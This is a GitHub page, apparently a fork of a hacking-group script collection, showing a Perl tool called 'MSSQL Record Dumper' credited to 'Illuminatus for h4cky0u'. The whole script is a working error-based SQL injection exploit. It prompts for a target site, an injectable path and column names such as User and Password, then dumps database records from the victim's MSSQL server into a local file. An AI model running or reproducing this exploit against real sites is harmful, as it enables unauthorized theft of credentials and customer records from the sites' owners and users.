forked from Shadow-Network/perl-scripts
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathMSSQL Record Dumper 0.1.1 Alpha.pl
More file actions
55 lines (43 loc) · 3.89 KB
/
MSSQL Record Dumper 0.1.1 Alpha.pl
File metadata and controls
55 lines (43 loc) · 3.89 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#!/usr/bin/perl
use LWP::UserAgent;
print "\n ----------------------------- ";
print "\n MSSQL Dumper v0.1.1 ";
print "\n ALPHA ";
print "\n By Illuminatus for h4cky0u ";
print "\n ----------------------------- ";
print "\n";
my $ua = LWP::UserAgent->new;
$colcount = 0;
sub args{
print "Hostname (e.g www.site.com):";$host = <STDIN>;chomp $host;
print "Path (e.g /products.asp?catid=):";$path = <STDIN>;chomp $path;
print "Database:";$db = <STDIN>;chomp $db;
print "Database table:";$table = <STDIN>;chomp $table;
print "How many columns would you like to dump:";$colnum = <STDIN>;chomp $colnum;
print "Column names (format: User,Password):";$colnames = <STDIN>;chomp $colnames;@cols = split(/,/, $colnames);
print "Records to dump (format: 1-23):";$rec = <STDIN>;chomp $rec;@recs = split (/-/, $rec);
$count = @recs[0];
}
sub getrecord{
while($colcount < $colnum){
my $url = "http://".$host.$path."1+AND+(select+cast(CHAR(+127+)%2b+rtrim(cast((select+ISNULL(cast(".@cols[$colcount]."+as+varchar)%2c'null')+from+(select+top+1+*++from+(select+TOP+".$count."+*+from+".$db."..customers+order+by+1+desc+)+dtable+order+by+1+asc)+finaltable)+as+varchar))%2b+CHAR(+127+)+as+int))+%3d+1++Or+3%3d6";
my $response = $ua->get($url);
my $content = $response->content;
if($content =~ m/value(.*)to/) {
open (RECORDS, '>>output.txt');
print RECORDS $1;
close (RECORDS);
}
$colcount++;
}
open (RECORDS, '>>output.txt');
print RECORDS "$count\n";
close (RECORDS);
}
args();
while ($count < @recs[1]){
getrecord();
$count++;
$colcount = 0;
}
print "Records saved to output.txt";